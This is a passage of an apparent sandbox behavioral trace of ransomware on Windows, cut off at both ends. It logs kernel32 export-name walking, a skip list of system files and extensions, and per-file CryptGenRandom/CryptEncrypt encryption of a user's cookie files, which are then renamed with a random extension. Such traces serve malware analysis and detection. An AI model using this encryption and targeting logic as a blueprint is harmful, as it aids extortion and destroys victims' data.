lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.141] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.141] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.141] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.141] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.141] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.141] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.141] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.141] lstrlenA (lpString="DELETEATOM") returned 10 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.141] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.141] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.141] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.142] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.142] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.142] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.142] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.142] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.142] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.142] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.142] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.142] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.142] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.142] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.142] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.142] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.142] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.142] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.142] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.142] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.142] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.143] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.143] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.143] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.143] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.143] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.143] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.143] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.143] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.143] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.143] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.143] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.143] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.143] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.143] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.143] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.143] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.143] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.143] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.143] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.144] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt") returned 109 [0079.144] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN") returned 117 [0079.144] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.erbu2tn"), dwFlags=0x0) returned 1 [0079.144] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.145] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.145] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.145] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fcb4b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fcb4b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adtech[2].txt", cAlternateFileName="5PC5B2~1.TXT")) returned 1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="autorun.inf") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="boot.ini") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="desktop.ini") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="ntuser.dat") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="iconcache.db") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="bootsect.bak") returned -1 [0079.145] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="ntuser.dat.log") returned -1 [0079.146] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="thumbs.db") returned -1 [0079.146] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="Bootfont.bin") returned -1 [0079.146] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtech[2].txt") returned 34 [0079.146] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.146] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.146] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.146] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.146] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adtech[2].txt") returned 34 [0079.146] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adtech[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" [0079.146] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtech[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.147] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=101) returned 1 [0079.147] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.147] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.147] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.147] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.147] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.149] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.149] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.150] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.150] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.150] CloseHandle (hObject=0x464) returned 1 [0079.150] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.150] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.151] CloseHandle (hObject=0x0) returned 0 [0079.151] CloseHandle (hObject=0x460) returned 1 [0079.152] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.152] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.153] GetTickCount () returned 0x114c488 [0079.153] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.153] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.153] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.153] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.153] lstrlenA (lpString="kernel32.dll") returned 12 [0079.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.154] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.154] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.154] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.154] lstrlenA (lpString="ADDATOMA") returned 8 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.154] lstrlenA (lpString="ADDATOMW") returned 8 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.154] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.154] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.154] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.154] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.154] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.154] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.154] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.154] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.154] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.155] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.155] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.155] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.155] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.155] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.155] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.155] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.155] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.155] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.155] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.155] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.155] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.155] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.155] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.155] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.155] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.155] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.155] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.156] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.156] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.156] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.156] lstrcpyA (in: 